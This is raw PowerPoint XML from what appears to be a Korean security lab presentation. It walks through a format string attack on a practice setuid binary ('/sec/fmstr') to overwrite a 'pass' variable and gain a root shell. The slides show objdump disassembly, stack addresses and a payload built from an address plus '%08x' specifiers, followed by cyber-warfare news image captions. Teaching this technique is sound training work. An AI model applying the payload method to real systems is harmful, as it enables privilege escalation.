                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC678E34-4942-49FE-B9D0-0104EB14B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981" y="1252979"/>
            <a:ext cx="3870325" cy="3414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CAEABC-BB50-468C-9324-155014192660}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="5146484"/>
            <a:ext cx="5616792" cy="134251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1" name="그룹 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC41548C-2860-4A58-B397-1C2FB1EBFC2D}"/>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8D29BBC-7933-42AE-8CC8-7D28590F626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B7184F27-96AC-440B-9D1A-6ECD1FEA5C8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7A543647-2FBE-4C63-8D1D-36F3603F92C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9769540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루트 쉘을 획득하여라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값이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144</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되면 루트 쉘을 획득할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역어셈블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(CentOS5.5</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4395104B-D563-401A-BE7D-47FE8C8E68AF}"/>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0809A7F8-261C-48CB-A7DF-F360A5AF3D1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195771A3-B701-4BD2-829F-C7E5CC1C12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6EEB9C-1C55-4DA4-A34F-D4E030F966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2109271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소스 파일 및 취약한 부분 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ vi </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사용으로 포맷 스트링 취약점이 존재함을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이면 루트 권한 쉘을 얻을 수 있음을 확인</a:t>
            </a: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ojdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>사용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>disassemble </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>및 취약한 부분 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>M intel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>-d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>fmstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>| more</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 113">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57FDDCC5-5EEB-4A7D-AA72-66E76071A90F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="529203" y="1308062"/>
            <a:ext cx="4970272" cy="2640330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 115">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55727F43-D33E-4A48-AFB1-B318A79B845C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6293899" y="481127"/>
            <a:ext cx="4970399" cy="2700528"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 117">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4965C47-8AF6-484B-821C-5976345E9ED4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect t="12552" r="353"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6315590" y="4046737"/>
            <a:ext cx="4927016" cy="2330136"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="그룹 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37926C61-9E1E-4777-994E-4F5F1EC49A6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5A17BFBF-D277-49BF-B430-F2777E6795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55B7A638-DE67-4E43-95C5-A739AF785E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D599F49F-7046-45AA-BD96-2B22441FED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9741445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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>fmstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>실행</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a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>pass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>변수의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>주소는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>0xbfffead0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>임을 확인</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>단</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>변수의 주소는 일부 변경될 수 있음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pass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>변수 조작 준비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   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>       "\xd0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"+“%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x“’)</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%08x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>는 총 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>개임</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>. pass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>변수의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>주소는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>0xbfffeaa0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>임</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>명령행</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 인자 길이에 따라 변경될 수 있음</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A0EFEB4-AA1E-4B58-9FBC-FD9B7F5B1480}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3579448156"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="497191" y="442099"/>
          <a:ext cx="4009639" cy="4624509"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4009639">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3874176564"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="20016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134640343"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="415117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시점에서의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3499081"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="63489" name="_x617086112">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19D643E2-0914-4348-BAF3-4D3A333DB3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4" r="492" b="3080"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="682117" y="914402"/>
            <a:ext cx="3221974" cy="40949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0">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{908F26EA-D7C6-4555-AAE7-A403C095029D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="497191" y="5536756"/>
            <a:ext cx="4935093" cy="653923"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="표 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B1E0E57-DBFB-4883-AA1C-049CABDDFC22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3154929117"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6269429" y="442099"/>
          <a:ext cx="4932807" cy="4150233"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4932807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3594700888"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="23050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0047818"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3881970">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6863989"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="63491" name="_x617765528">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{918F0D9E-653E-406B-BAF4-FA91A13F8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944" y="954128"/>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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{408F8867-D6D3-4DBD-92F8-8F6CBA583609}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6"/>
          <a:srcRect l="1033" t="4059" r="833" b="3893"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6269429" y="5343526"/>
            <a:ext cx="4868292" cy="695326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="그룹 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B241CCE8-76BE-4F5B-889A-050E4701A33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0E93B51-CF56-4750-98D0-70C1025A44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E9599C1-851B-4787-9600-E3DC3DBC7C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B2C25089-473D-40C3-B5BF-1942574A072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73323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1897A156-4D8D-4AC0-A570-59C6AB5495DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1342784323"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="487602"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argv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포함된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%08x’</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스택의 값을 하나씩 읽어온다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pic>
        <p:nvPicPr>
          <p:cNvPr id="66562" name="_x617086400">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B2B15A9-8D12-412B-A71B-F57674F3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154"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66561" name="_x617086688">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07057C53-AA77-404F-B1EB-DB62815F0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08"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표 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2601F245-3D40-4C1F-8FEB-C8D2C9432FFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1950185702"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6284887"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="그룹 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95E72B75-F2C4-448D-BB0F-ED714C8CB171}"/>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B5FB524-2A7F-4EA0-AA86-4829FA74F8F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4C555452-6A6E-4A35-B29D-DBEA707C16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800FF3A-194C-4235-B77E-3DA1AA34F8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30293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pass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>변수 조작 시도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76</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>으로 변경됨을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p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9C2C54A-5F0A-496C-967B-013EAF2B9B3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1461192320"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="488831" y="475102"/>
          <a:ext cx="5379232" cy="4158107"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5379232">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="25470910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1660690"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3911854">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024917"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="67585" name="_x618891432">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CDE8608-6A28-4B63-89D9-FDF1DFFE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98" y="993484"/>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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16D4CBBE-FD7A-4F02-AAEB-6ADC28FB1D87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="488831" y="5331422"/>
            <a:ext cx="4982591" cy="723011"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="표 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53B88285-BDAF-4E0F-89EA-AE93331359EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="887382142"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6317137" y="481834"/>
          <a:ext cx="5386032" cy="4164940"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5386032">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3481946896"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="23268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78066711"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3918687">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9939432"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="67587" name="_x1659517408">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39DFB036-1896-41D8-BB25-802AF9721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652" y="993484"/>
            <a:ext cx="4803775" cy="35941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91194799-3A69-459C-ABC8-68487908CD1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9A1DF76D-94BA-492B-9E57-8024F5DDB66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E11494-B135-45A7-87B3-4C2FAEEA43B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A82DA6DB-0E65-49C8-98C9-59EA09BFA4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73309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다영역작전이란 육해공을 위주로 한 전통적 영역 이외의 사이버와 우주 그리고 전자기장 영역까지를 포함하는 새로운 미 육군의 교리이다. 사진=미 육군">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F775E46-94E2-4239-BD0C-1BDD22D84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43" y="2202637"/>
            <a:ext cx="3530827" cy="1980708"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:ex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dirty="0"/>
              <a:t>사이버전</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>? </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76" name="Picture 8" descr="러시아 추정 해커, 美 재무부·통신정보청 이메일 들여다봤다&quot; - Chosunbiz &gt; 국제">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD7E7802-5DF6-4A74-A5AA-57EB6F5D9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1330" y="4613186"/>
            <a:ext cx="2862470" cy="18796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北의 사이버 공격 급증… '사이버戰 교전 수칙' 검토 - 조선일보">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A8C303F-1425-4181-BFEC-C74121BC06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331" y="4603002"/>
            <a:ext cx="2238640" cy="1175286"/>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4D0D3A23-F694-4ABF-A98F-6D52B549C83E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="665015" y="6031899"/>
            <a:ext cx="3597605" cy="233887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7180" name="Picture 12" descr="씨네마 사이언스] “자, 선수 입장!” 영화 속 '해커'의 세계 - 이뉴스투데이">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7475B35-02B4-4DD9-986C-D6991181FF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7984" y="4603002"/>
